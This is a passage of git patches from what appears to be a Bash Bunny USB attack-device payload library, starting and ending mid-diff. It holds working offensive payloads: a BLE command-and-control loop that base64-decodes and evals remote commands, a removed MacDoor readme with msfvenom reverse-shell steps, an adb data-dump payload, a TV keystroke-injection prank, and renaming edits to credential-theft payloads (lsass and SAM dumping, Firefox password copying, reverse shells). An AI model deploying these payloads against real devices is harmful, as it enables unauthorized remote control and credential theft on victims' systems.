ENTER - -# Minimize terminal -QUACK GUI m -QUACK DELAY 2000 - -# Standby -LED FINISH diff --git a/payloads/library/remote_access/MacDoor/readme.md b/payloads/library/remote_access/MacDoor/readme.md deleted file mode 100644 index 7fd07093..00000000 --- a/payloads/library/remote_access/MacDoor/readme.md +++ /dev/null @@ -1,30 +0,0 @@ -# MacDoor - Python Backdoor Execution for MacOS - -``` - __ ___ ____ - / |/ /____ _ _____ / __ \ ____ ____ _____ - / /|_/ // __ `// ___// / / // __ \ / __ \ / ___/ - / / / // /_/ // /__ / /_/ // /_/ // /_/ // / -/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/ -``` - -* Author: afsh4ck -* Version: 1.0 -* Target: MacOS -* Tested on: Ventura 13.3.1 -* Category: Remote Access - -# DESCRIPTION - -Download a Python backdoor from our server, run it in terminal and minimize the terminal window. - -# STEPS - -* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py -* Step 2: mount a local server 'python3 -m http.server' -* Step 3: msfconsole multi/handler listener open before the attack. - -# NOTE - -* You need to modify the script with your attacker IP and the port or your local server. - From 678359b7c73ee70d60a4f61e143789a023820eeb Mon Sep 17 00:00:00 2001 From: 90N45 <79598596+90N45-d3v@users.noreply.github.com> Date: Tue, 31 Oct 2023 16:47:18 +0100 Subject: [PATCH 39/56] Add BlueBunny Command & Control (C2) solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II. --- .../library/remote_access/BlueBunny/README.md | 20 ++++++ .../remote_access/BlueBunny/payload.txt | 63 +++++++++++++++++++ 2 files changed, 83 insertions(+) create mode 100644 payloads/library/remote_access/BlueBunny/README.md create mode 100644 payloads/library/remote_access/BlueBunny/payload.txt diff --git a/payloads/library/remote_access/BlueBunny/README.md b/payloads/library/remote_access/BlueBunny/README.md new file mode 100644 index 00000000..9df8124c --- /dev/null +++ b/payloads/library/remote_access/BlueBunny/README.md @@ -0,0 +1,20 @@ +# BlueBunny +* Author: 90N45 +* Version: 1.0 +* Category: Remote +* Attackmodes: NONE (Custom) + +### Description +Command & Control (C2) solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II. +Send your Bash Bunny all the instructions it needs on-demand over the air. + +### Setup +This payload makes your Bash Bunny usable for the BlueBunny C2 server. For installing the C2 server and controlling your Bash Bunny remotly from it you can follow the instructions form the [BlueBunny GitHub repository](https://github.com/90N45-d3v/BlueBunny) + +### Status +| LED | State | +| --- | --- | +| Magenta solid (SETUP) | Configuring BLE | +| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Bash Bunny can be connected to BlueBunny C2 | + +*Average runtime: 13 seconds* \ No newline at end of file diff --git a/payloads/library/remote_access/BlueBunny/payload.txt b/payloads/library/remote_access/BlueBunny/payload.txt new file mode 100644 index 00000000..e5325aa1 --- /dev/null +++ b/payloads/library/remote_access/BlueBunny/payload.txt @@ -0,0 +1,63 @@ +#!/bin/bash +# +# Title: BlueBunny +# Description: BLE based C2 server for the Bash Bunny Mark II +# Author: 90N45 +# Version: 1.0 +# Category: Remote +# Attackmodes: NONE (Custom) + +LED SETUP + +# Enable serial BLE module +stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost +stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost +sleep 1 + +# Configure BLE module as slave +echo -n -e "AT+ROLE=0" > /dev/ttyS1 +echo -n -e "AT+NAME=BlueBunny" > /dev/ttyS1 +echo -n -e "AT+ADV=1" > /dev/ttyS1 +echo -n -e "AT+RESET" > /dev/ttyS1 + +LED FINISH + +while [[ true ]]; do + # Get incomming data from serial port + data=$(head -1 /dev/ttyS1) + + # Decode base64 encoded data + data=$(echo ${data} | base64 -d) + + # Echo data for debugging + echo "Debugger: ${data}" + + # Single command + if [[ $data =~ "" ]]; then + # Extract command + command=${data#*} + command=${command%%*} + + # Run recieved command + eval "${command}" + fi + + # Payload file + if [[ $data =~ "" ]]; then + # Set payload file name + file="BlueBunnyPayload-${RANDOM}.txt" + + # Extract file content + content=${data#*} + content=${content%%*} + + # Write content to file + printf "${content}" > "${file}"; + + # Run payload + bash $file + + # Remove payload file + rm $file + fi +done \ No newline at end of file From f2eb8d860693876a0ab7d20acd69c9a4826857ff Mon Sep 17 00:00:00 2001 From: 90N45 <79598596+90N45-d3v@users.noreply.github.com> Date: Sun, 19 Nov 2023 21:45:18 +0100 Subject: [PATCH 40/56] Add TV-Menu-Trigger This payload opens the main menu of a TV repeatedly at a random interval (1-10 minutes) to confuse and annoy the user. --- .../library/prank/TV-Menu-Trigger/README.md | 21 +++++++++++ .../library/prank/TV-Menu-Trigger/payload.txt | 35 +++++++++++++++++++ 2 files changed, 56 insertions(+) create mode 100644 payloads/library/prank/TV-Menu-Trigger/README.md create mode 100644 payloads/library/prank/TV-Menu-Trigger/payload.txt diff --git a/payloads/library/prank/TV-Menu-Trigger/README.md b/payloads/library/prank/TV-Menu-Trigger/README.md new file mode 100644 index 00000000..3a160a5a --- /dev/null +++ b/payloads/library/prank/TV-Menu-Trigger/README.md @@ -0,0 +1,21 @@ +# TV-Menu-Trigger +* Author: 90N45 +* Version: 1.0 +* Target: TV +* Attackmodes: HID + +### Description +This payload opens the main menu of a TV repeatedly at a random interval (1-10 minutes) to confuse and annoy the user. + +### Explanation +Almost every TV has the function of being used by a connected USB keyboard. Therefore, we can use the Bash Bunny to emulate a keyboard and inject keystrokes into the TV. In this case, we inject the keycode for the `GUI` key to open the TV's menu (equivalent to the MENU button on your traditional remote control). Of course, the key required to open the menu could change, because of different vendors, but the keycode of the `GUI` key seems to work for most TVs. + +### Tip +Plug your Bash Bunny into a USB port of the TV before it is switched on by your target. This makes it easier to overlook the possible message of a connected keyboard (especially with webOS/LG TVs, as the message is very small on these models and is displayed for a short time). + +### Status +| LED | State | +| --- | --- | +| Magenta solid (SETUP) | Set ATTACKMODE and configure CPU performance | +| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attacking the TV (Currently waiting for the random interval to complete) | +| Red 1000ms | Opening the TV’s menu | \ No newline at end of file diff --git a/payloads/library/prank/TV-Menu-Trigger/payload.txt b/payloads/library/prank/TV-Menu-Trigger/payload.txt new file mode 100644 index 00000000..d5f4848c --- /dev/null +++ b/payloads/library/prank/TV-Menu-Trigger/payload.txt @@ -0,0 +1,35 @@ +#!/bin/bash +# +# Title: TV-Menu-Trigger +# Description: This payload opens the main menu of a TV repeatedly at a random interval (1-10 minutes) to confuse and annoy the user. +# Author: 90N45 +# Version: 1.0 +# Category: Prank +# Attackmodes: HID + +LED SETUP + +ATTACKMODE HID + +# Tune the Bash Bunny's CPU to low power/performance for long term deployments +CUCUMBER ENABLE + +LED FINISHED + +while [[ true ]]; do + LED G + # Generate interval time + rand=$((6 + $RANDOM % 60)) + interval="$rand"0000 + + # Wait given interval time + Q DELAY ${interval} + + # LED feedback on HID injection + LED R + + # Open menu + Q GUI + + Q DELAY 1000 +done \ No newline at end of file From 92e37f98f88fe382b15043ed880a6fbebd1ced34 Mon Sep 17 00:00:00 2001 From: D14b0l1c <66981132+D14b0l1c@users.noreply.github.com> Date: Thu, 4 Apr 2024 14:09:01 -0700 Subject: [PATCH 41/56] adb shell dumpsys --- .../library/adb_shell_dumpsys/payload.txt | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 payloads/library/adb_shell_dumpsys/payload.txt diff --git a/payloads/library/adb_shell_dumpsys/payload.txt b/payloads/library/adb_shell_dumpsys/payload.txt new file mode 100644 index 00000000..f39ebf78 --- /dev/null +++ b/payloads/library/adb_shell_dumpsys/payload.txt @@ -0,0 +1,30 @@ +# Set the Bash Bunny to ECM Ethernet attack mode +ATTACKMODE ECM_ETHERNET + +# Wait for 5 seconds to ensure the network interface is ready +sleep 5 + +# Extract the IP address of the connected device from DHCP leases +TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq) + +# Save the obtained IP address to a log file +cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq > /root/logs.txt + +# Connect to the device using ADB over TCP/IP and save the output to a log file +adb connect ${TARGET_IP} +adb connect ${TARGET_IP} > /root/logs.txt + +# Wait for 20 seconds (optional) +sleep 20 + +# Dump system information from the device and save it to a file +adb shell dumpsys > /root/dumpsys.txt + +# Wait for 10 seconds (optional) +sleep 10 + +# Set the Bash Bunny back to ECM Ethernet attack mode +ATTACKMODE ECM_ETHERNET + +# Indicate that the payload has finished executing +LED FINISH \ No newline at end of file From c757f1d274fda6778986dd6bbfb553b3a254c271 Mon Sep 17 00:00:00 2001 From: D14b0l1c <66981132+D14b0l1c@users.noreply.github.com> Date: Thu, 4 Apr 2024 14:23:53 -0700 Subject: [PATCH 42/56] adb shell dumpsys --- .../android/adb_shell_dumpsys/payload.txt | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 payloads/library/mobile/android/adb_shell_dumpsys/payload.txt diff --git a/payloads/library/mobile/android/adb_shell_dumpsys/payload.txt b/payloads/library/mobile/android/adb_shell_dumpsys/payload.txt new file mode 100644 index 00000000..f39ebf78 --- /dev/null +++ b/payloads/library/mobile/android/adb_shell_dumpsys/payload.txt @@ -0,0 +1,30 @@ +# Set the Bash Bunny to ECM Ethernet attack mode +ATTACKMODE ECM_ETHERNET + +# Wait for 5 seconds to ensure the network interface is ready +sleep 5 + +# Extract the IP address of the connected device from DHCP leases +TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq) + +# Save the obtained IP address to a log file +cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq > /root/logs.txt + +# Connect to the device using ADB over TCP/IP and save the output to a log file +adb connect ${TARGET_IP} +adb connect ${TARGET_IP} > /root/logs.txt + +# Wait for 20 seconds (optional) +sleep 20 + +# Dump system information from the device and save it to a file +adb shell dumpsys > /root/dumpsys.txt + +# Wait for 10 seconds (optional) +sleep 10 + +# Set the Bash Bunny back to ECM Ethernet attack mode +ATTACKMODE ECM_ETHERNET + +# Indicate that the payload has finished executing +LED FINISH \ No newline at end of file From aa16c0f8221d84cee1143b38f1e1fdd3aafb6fa5 Mon Sep 17 00:00:00 2001 From: D14b0l1c <66981132+D14b0l1c@users.noreply.github.com> Date: Thu, 4 Apr 2024 14:25:57 -0700 Subject: [PATCH 43/56] Delete payloads/library/adb_shell_dumpsys directory --- .../library/adb_shell_dumpsys/payload.txt | 30 ------------------- 1 file changed, 30 deletions(-) delete mode 100644 payloads/library/adb_shell_dumpsys/payload.txt diff --git a/payloads/library/adb_shell_dumpsys/payload.txt b/payloads/library/adb_shell_dumpsys/payload.txt deleted file mode 100644 index f39ebf78..00000000 --- a/payloads/library/adb_shell_dumpsys/payload.txt +++ /dev/null @@ -1,30 +0,0 @@ -# Set the Bash Bunny to ECM Ethernet attack mode -ATTACKMODE ECM_ETHERNET - -# Wait for 5 seconds to ensure the network interface is ready -sleep 5 - -# Extract the IP address of the connected device from DHCP leases -TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq) - -# Save the obtained IP address to a log file -cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq > /root/logs.txt - -# Connect to the device using ADB over TCP/IP and save the output to a log file -adb connect ${TARGET_IP} -adb connect ${TARGET_IP} > /root/logs.txt - -# Wait for 20 seconds (optional) -sleep 20 - -# Dump system information from the device and save it to a file -adb shell dumpsys > /root/dumpsys.txt - -# Wait for 10 seconds (optional) -sleep 10 - -# Set the Bash Bunny back to ECM Ethernet attack mode -ATTACKMODE ECM_ETHERNET - -# Indicate that the payload has finished executing -LED FINISH \ No newline at end of file From 15cc8b08bfb691d8aa33bb90362922070e49782a Mon Sep 17 00:00:00 2001 From: D14b0l1c <66981132+D14b0l1c@users.noreply.github.com> Date: Thu, 4 Apr 2024 14:36:05 -0700 Subject: [PATCH 44/56] Update payload.txt --- .../android/adb_shell_dumpsys/payload.txt | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/payloads/library/mobile/android/adb_shell_dumpsys/payload.txt b/payloads/library/mobile/android/adb_shell_dumpsys/payload.txt index f39ebf78..673f2c1a 100644 --- a/payloads/library/mobile/android/adb_shell_dumpsys/payload.txt +++ b/payloads/library/mobile/android/adb_shell_dumpsys/payload.txt @@ -1,3 +1,19 @@ +# Title: adb shell dumpsys +# Author: D14b0l1c +# +# Description: +# Set the Bash Bunny to ECM Ethernet attack mode +# Extract the IP address of the connected device from DHCP leases +# Connect to the device using ADB over TCP/IP and save the output to a log file +# Dump system information from the device and save it to a file +# Indicate that the payload has finished executing +# +# LED States: +# - Purple: Running HID emulation, connecting to the Android device +# - Blue Blinking: Running the 'adb shell dumpsys' command +# - Red Blinking: Failed to connect to the Android device +# - Green: Finished + # Set the Bash Bunny to ECM Ethernet attack mode ATTACKMODE ECM_ETHERNET @@ -27,4 +43,4 @@ sleep 10 ATTACKMODE ECM_ETHERNET # Indicate that the payload has finished executing -LED FINISH \ No newline at end of file +LED FINISH From a072c2cf5930385586c0d5a9ac003c82e69e5e85 Mon Sep 17 00:00:00 2001 From: D14b0l1c <66981132+D14b0l1c@users.noreply.github.com> Date: Thu, 4 Apr 2024 14:38:22 -0700 Subject: [PATCH 45/56] Create readme.md --- .../android/adb_shell_dumpsys/readme.md | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 payloads/library/mobile/android/adb_shell_dumpsys/readme.md diff --git a/payloads/library/mobile/android/adb_shell_dumpsys/readme.md b/payloads/library/mobile/android/adb_shell_dumpsys/readme.md new file mode 100644 index 00000000..74495ad4 --- /dev/null +++ b/payloads/library/mobile/android/adb_shell_dumpsys/readme.md @@ -0,0 +1,35 @@ +## Requirements + +Before using this Bash Bunny payload, please ensure you meet the following requirements: + +- **Bash Bunny device**: This payload is designed to run on the Bash Bunny hardware platform. Make sure you have a Bash Bunny device available. +- **Installation of essential `adb` packages**: In order to enable `adb` functionality on the Bash Bunny, you need to install the following packages: + - `android-liblog` + - `android-libbase` + - `android-libcutils` + - `android-libadb` + - `adb` + +### Installing Essential `adb` Packages + +To install the required `adb` packages on your Bash Bunny, follow these steps: + +1. Connect your Bash Bunny to a computer. +2. Open a terminal window and navigate to the Bash Bunny storage directory. +3. Execute the following commands to download and install the essential `adb` packages: + +```bash +wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/android-liblog_7.0.0+r33-1_armhf.deb +dpkg -i android-liblog_7.0.0+r33-1_armhf.deb + +wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/android-libbase_7.0.0+r33-1_armhf.deb +dpkg -i android-libbase_7.0.0+r33-1_armhf.deb + +wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/android-libcutils_7.0.0+r33-1_armhf.deb +dpkg -i android-libcutils_7.0.0+r33-1_armhf.deb + +wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/android-libadb_7.0.0+r33-1_armhf.deb +dpkg -i android-libadb_7.0.0+r33-1_armhf.deb + +wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/adb_7.0.0+r33-1_armhf.deb +dpkg -i adb_7.0.0+r33-1_armhf.deb From 27ad6acfe23f43829458dce23234680ae5fe5b7f Mon Sep 17 00:00:00 2001 From: 0i41E <79219148+0i41E@users.noreply.github.com> Date: Tue, 28 May 2024 19:34:18 +0200 Subject: [PATCH 46/56] Username Change --- payloads/library/credentials/FireSnatcher/README.md | 2 +- payloads/library/credentials/FireSnatcher/payload.txt | 2 +- payloads/library/credentials/HashDumpBunny/README.md | 4 ++-- payloads/library/credentials/HashDumpBunny/payload.txt | 2 +- payloads/library/credentials/MiniDumpBunny/README.md | 4 ++-- payloads/library/credentials/MiniDumpBunny/payload.txt | 2 +- payloads/library/credentials/ProcDumpBunny/README.md | 8 ++++---- payloads/library/credentials/ProcDumpBunny/payload.txt | 2 +- payloads/library/credentials/SamDumpBunny/README.md | 4 ++-- payloads/library/credentials/SamDumpBunny/payload.txt | 2 +- payloads/library/credentials/SessionBunny/README.md | 4 ++-- .../library/credentials/SessionBunny/SessionBunny.ps1 | 2 +- payloads/library/credentials/SessionBunny/payload.txt | 2 +- payloads/library/execution/SerialNumBunny/1.PS1 | 2 +- payloads/library/execution/SerialNumBunny/payload.txt | 2 +- payloads/library/execution/SerialNumBunny/readme.md | 4 ++-- payloads/library/exfiltration/WifiSnatch/payload.txt | 2 +- payloads/library/prank/-BB-AcidBurn/README.md | 2 +- payloads/library/prank/-BB-JumpScare/README.md | 2 +- payloads/library/remote_access/PingZhellBunny/Bunny.pl | 2 +- payloads/library/remote_access/PingZhellBunny/README.md | 2 +- payloads/library/remote_access/PingZhellBunny/payload.txt | 2 +- payloads/library/remote_access/ReverseBunny/README.md | 4 ++-- payloads/library/remote_access/ReverseBunny/payload.txt | 2 +- payloads/library/remote_access/ReverseBunnySSL/README.md | 6 +++--- .../library/remote_access/ReverseBunnySSL/payload.txt | 2 +- 26 files changed, 37 insertions(+), 37 deletions(-) diff --git a/payloads/library/credentials/FireSnatcher/README.md b/payloads/library/credentials/FireSnatcher/README.md index 1d3b0dd0..d55eed6e 100644 --- a/payloads/library/credentials/FireSnatcher/README.md +++ b/payloads/library/credentials/FireSnatcher/README.md @@ -1,7 +1,7 @@ # Title: FireSnatcher # Description: Copies Wifi Keys, and Firefox Password Databases # Author: KarrotKak3 -# Props: saintcrossbow & 0iphor13 +# Props: saintcrossbow & 0i41E # Version: 1.0.2.0 (Work in Progress) # Category: Credentials # Target: Windows (Logged in) diff --git a/payloads/library/credentials/FireSnatcher/payload.txt b/payloads/library/credentials/FireSnatcher/payload.txt index 143efd55..3c1c4443 100644 --- a/payloads/library/credentials/FireSnatcher/payload.txt +++ b/payloads/library/credentials/FireSnatcher/payload.txt @@ -1,7 +1,7 @@ # Title: FireSnatcher # Description: Copies Wifi Keys, and Firefox Password Databases # Author: KarrotKak3 -# Props: saintcrossbow & 0iphor13 +# Props: saintcrossbow & 0i41E # Version: 1.0.2.0 (Work in Progress) # Category: Credentials # Target: Windows (Logged in) diff --git a/payloads/library/credentials/HashDumpBunny/README.md b/payloads/library/credentials/HashDumpBunny/README.md index b1460dd5..905c12fb 100644 --- a/payloads/library/credentials/HashDumpBunny/README.md +++ b/payloads/library/credentials/HashDumpBunny/README.md @@ -1,6 +1,6 @@ **Title: HashDumpBunny** -Author: 0iphor13 +Author: 0i41E Version: 1.0 @@ -17,4 +17,4 @@ Place BunnyDump.bat in the same payload switch-folder as your payload.txt # Plug in BashBunny. Exfiltrate the out.txt file and try to crack the hashes. -![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png) +![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png) diff --git a/payloads/library/credentials/HashDumpBunny/payload.txt b/payloads/library/credentials/HashDumpBunny/payload.txt index f21e4a36..2e9e6843 100644 --- a/payloads/library/credentials/HashDumpBunny/payload.txt +++ b/payloads/library/credentials/HashDumpBunny/payload.txt @@ -2,7 +2,7 @@ # # Title: HashDumpBunny # Description: Dump user hashes with this script, which was obfuscated with multiple layers. -# Author: 0iphor13 +# Author: 0i41E # Version: 1.0 # Category: Credentials # Attackmodes: HID, Storage diff --git a/payloads/library/credentials/MiniDumpBunny/README.md b/payloads/library/credentials/MiniDumpBunny/README.md index a6fba8e0..c314caf2 100644 --- a/payloads/library/credentials/MiniDumpBunny/README.md +++ b/payloads/library/credentials/MiniDumpBunny/README.md @@ -1,6 +1,6 @@ **Title: MiniDumpBunny** -Author: 0iphor13 +Author: 0i41E Version: 1.0 @@ -14,4 +14,4 @@ What is MiniDumpBunny? Plug in your BashBunny equipped with the obfuscated MiniBunny.bat file, wait a few seconds, go away. # Exfiltrate the .dmp file and read it with Mimikatz. -![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png) \ No newline at end of file +![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png) \ No newline at end of file diff --git a/payloads/library/credentials/MiniDumpBunny/payload.txt b/payloads/library/credentials/MiniDumpBunny/payload.txt index 2fc58a03..467e748a 100644 --- a/payloads/library/credentials/MiniDumpBunny/payload.txt +++ b/payloads/library/credentials/MiniDumpBunny/payload.txt @@ -2,7 +2,7 @@ # # Title: MiniDumpBunny # Description: Dump lsass with this script, which was obfuscated with multiple layers. -# Author: 0iphor13 +# Author: 0i41E # Version: 1.0 # Category: Credentials # Attackmodes: HID, Storage diff --git a/payloads/library/credentials/ProcDumpBunny/README.md b/payloads/library/credentials/ProcDumpBunny/README.md index 31b9ef73..afcf570b 100644 --- a/payloads/library/credentials/ProcDumpBunny/README.md +++ b/payloads/library/credentials/ProcDumpBunny/README.md @@ -1,6 +1,6 @@ **Title: ProcDumpBunny** -Author: 0iphor13 +Author: 0i41E Version: 1.0 @@ -12,10 +12,10 @@ What is ProcDumpBunny? **Instruction:** Download ProcDump from Microsoft - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump - rename the Executeable to Bunny.exe -![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(38).png) +![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(38).png) Place Bunny.exe in the same payload switch as your payload -![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(37).png) +![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(37).png) # Plug in BashBunny. Exfiltrate the out.dmp file and read it with Mimikatz. -![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(39).png) +![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(39).png) diff --git a/payloads/library/credentials/ProcDumpBunny/payload.txt b/payloads/library/credentials/ProcDumpBunny/payload.txt index b0275b7e..9480cf77 100644 --- a/payloads/library/credentials/ProcDumpBunny/payload.txt +++ b/payloads/library/credentials/ProcDumpBunny/payload.txt @@ -2,7 +2,7 @@ # # Title: ProcDumpBunny # Description: Dump lsass.exe with a renamed version of procdump -# Author: 0iphor13 +# Author: 0i41E # Version: 1.0 # Category: Credentials # Attackmodes: HID, Storage diff --git a/payloads/library/credentials/SamDumpBunny/README.md b/payloads/library/credentials/SamDumpBunny/README.md index 683fd00d..6e64f4fa 100644 --- a/payloads/library/credentials/SamDumpBunny/README.md +++ b/payloads/library/credentials/SamDumpBunny/README.md @@ -1,6 +1,6 @@ **Title: SamDumpBunny** -

Author: 0iphor13
+

Author: 0i41E
OS: Windows
Version: 1.0
@@ -21,4 +21,4 @@ Afterwards you can use a tool like samdump2 to extract the users hashes.

**!Disclaimer! samdump2 has proven to be unreliable in the recent past.** -![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png) +![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png) diff --git a/payloads/library/credentials/SamDumpBunny/payload.txt b/payloads/library/credentials/SamDumpBunny/payload.txt index cc3120e3..a84d08de 100644 --- a/payloads/library/credentials/SamDumpBunny/payload.txt +++ b/payloads/library/credentials/SamDumpBunny/payload.txt @@ -2,7 +2,7 @@ # # Title: SamDumpBunny # Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes. -# Author: 0iphor13 +# Author: 0i41E # Version: 1.0 # Category: Credentials # Attackmodes: HID, Storage diff --git a/payloads/library/credentials/SessionBunny/README.md b/payloads/library/credentials/SessionBunny/README.md index ae8d4d7a..b8d45347 100644 --- a/payloads/library/credentials/SessionBunny/README.md +++ b/payloads/library/credentials/SessionBunny/README.md @@ -1,6 +1,6 @@ **Title: SessionBunny** -Author: 0iphor13 +Author: 0i41E (Credit for SessionGopher: Brandon Arvanaghi) Version: 1.0 @@ -19,4 +19,4 @@ Place SessionBunny.ps1 in the same payload switch-folder as your payload.txt # Plug in BashBunny. Wait for the script to finish and decide what you wanna do with the information gathered -![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/SessionBunny/censorepic.png) +![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/SessionBunny/censorepic.png) diff --git a/payloads/library/credentials/SessionBunny/SessionBunny.ps1 b/payloads/library/credentials/SessionBunny/SessionBunny.ps1 index c7bd7818..568b324d 100644 --- a/payloads/library/credentials/SessionBunny/SessionBunny.ps1 +++ b/payloads/library/credentials/SessionBunny/SessionBunny.ps1 @@ -43,7 +43,7 @@ o o_ / ". SessionGopher - ," _-" Bunny Edition (0iphor13) + ," _-" Bunny Edition (0i41E) ," m m ..+ ) Brandon Arvanaghi `m..m @arvanaghi | arvanaghi.com diff --git a/payloads/library/credentials/SessionBunny/payload.txt b/payloads/library/credentials/SessionBunny/payload.txt index 4531e181..e07f9cf5 100644 --- a/payloads/library/credentials/SessionBunny/payload.txt +++ b/payloads/library/credentials/SessionBunny/payload.txt @@ -1,7 +1,7 @@ #!/bin/bash # # Title: SessionBunny -# Author: 0iphor13 +# Author: 0i41E # Version: 1.0 # Category: Credentials # Attackmodes: HID, Storage diff --git a/payloads/library/execution/SerialNumBunny/1.PS1 b/payloads/library/execution/SerialNumBunny/1.PS1 index 0ed38dc7..620c62ba 100644 --- a/payloads/library/execution/SerialNumBunny/1.PS1 +++ b/payloads/library/execution/SerialNumBunny/1.PS1 @@ -12,4 +12,4 @@ $Picture=@" Sleep -s 5 Write-Host -ForegroundColor red "$Picture" Sleep -s 2 -Write-Host -ForegroundColor green "SerialNumBunny by 0iphor13" \ No newline at end of file +Write-Host -ForegroundColor green "SerialNumBunny by 0i41E" \ No newline at end of file diff --git a/payloads/library/execution/SerialNumBunny/payload.txt b/payloads/library/execution/SerialNumBunny/payload.txt index 1f177baf..3869c8d0 100644 --- a/payloads/library/execution/SerialNumBunny/payload.txt +++ b/payloads/library/execution/SerialNumBunny/payload.txt @@ -2,7 +2,7 @@ # # Title: SerialNumBunny # Description: Execute strings placed in the Bunny serial number -# Author: 0iphor13 +# Author: 0i41E # Version: 1.0 # Category: Execution # Attackmodes: HID, RNDIS_ETHERNET diff --git a/payloads/library/execution/SerialNumBunny/readme.md b/payloads/library/execution/SerialNumBunny/readme.md index ac20f5f5..1139e40a 100644 --- a/payloads/library/execution/SerialNumBunny/readme.md +++ b/payloads/library/execution/SerialNumBunny/readme.md @@ -1,6 +1,6 @@ **Title: SerialNumBunny** -

Author: 0iphor13
+

Author: 0i41E
OS: Windows
Version: 1.0
@@ -14,6 +14,6 @@ You can get pretty creative here, from basically calling basic powershell comman - Upload your script or the example provided onto your Bunnys switch folder. - Plug in the Bunny and let the magic happen. -![SerialNumBunny](https://github.com/0iphor13/bashbunny-payloads/assets/79219148/fa11d9b5-e2f2-45a9-a701-5a25220ca226) +![SerialNumBunny](https://github.com/0i41E/bashbunny-payloads/assets/79219148/fa11d9b5-e2f2-45a9-a701-5a25220ca226) _Note: If you want to adapt your payload nested, in the serial number, you may need to stay in a certain character limit. In my case this was 40 characters. This might be different, depending on your target. Also make sure to replace spaces within the serial number with underscores._ diff --git a/payloads/library/exfiltration/WifiSnatch/payload.txt b/payloads/library/exfiltration/WifiSnatch/payload.txt index 45aa88ce..42b6c249 100644 --- a/payloads/library/exfiltration/WifiSnatch/payload.txt +++ b/payloads/library/exfiltration/WifiSnatch/payload.txt @@ -2,7 +2,7 @@ # # Title: WifiSnatch # Description: Extract wifi information, such as passphrases & SSIDs -# Author: 0iphor13 +# Author: 0i41E # Version: 1.1 # Category: Exfiltration # Attackmodes: HID, Storage diff --git a/payloads/library/prank/-BB-AcidBurn/README.md b/payloads/library/prank/-BB-AcidBurn/README.md index 9e799ed1..5b83236a 100644 --- a/payloads/library/prank/-BB-AcidBurn/README.md +++ b/payloads/library/prank/-BB-AcidBurn/README.md @@ -105,7 +105,7 @@ Arf * [Hak5](https://hak5.org/) * [MG](https://github.com/OMG-MG) -* [0iphor13](https://github.com/0iphor13) +* [0i41E](https://github.com/0i41E) * [PhilSutter](https://github.com/PhilSutter) diff --git a/payloads/library/prank/-BB-JumpScare/README.md b/payloads/library/prank/-BB-JumpScare/README.md index 69ef63f2..ece60b5d 100644 --- a/payloads/library/prank/-BB-JumpScare/README.md +++ b/payloads/library/prank/-BB-JumpScare/README.md @@ -93,7 +93,7 @@ I am Jakoby * [Hak5](https://hak5.org/) * [MG](https://github.com/OMG-MG) -* [0iphor13](https://github.com/0iphor13) +* [0i41E](https://github.com/0i41E) * [PhilSutter](https://github.com/PhilSutter) diff --git a/payloads/library/remote_access/PingZhellBunny/Bunny.pl b/payloads/library/remote_access/PingZhellBunny/Bunny.pl index 4bac2738..2a835894 100644 --- a/payloads/library/remote_access/PingZhellBunny/Bunny.pl +++ b/payloads/library/remote_access/PingZhellBunny/Bunny.pl @@ -15,7 +15,7 @@ # You should have received a copy of the GNU General Public License # along with this program. If not, see . # -# Modified by 0iphor13 for PingZhellBunny +# Modified by 0i41E for PingZhellBunny # # # diff --git a/payloads/library/remote_access/PingZhellBunny/README.md b/payloads/library/remote_access/PingZhellBunny/README.md index 6b190001..93203488 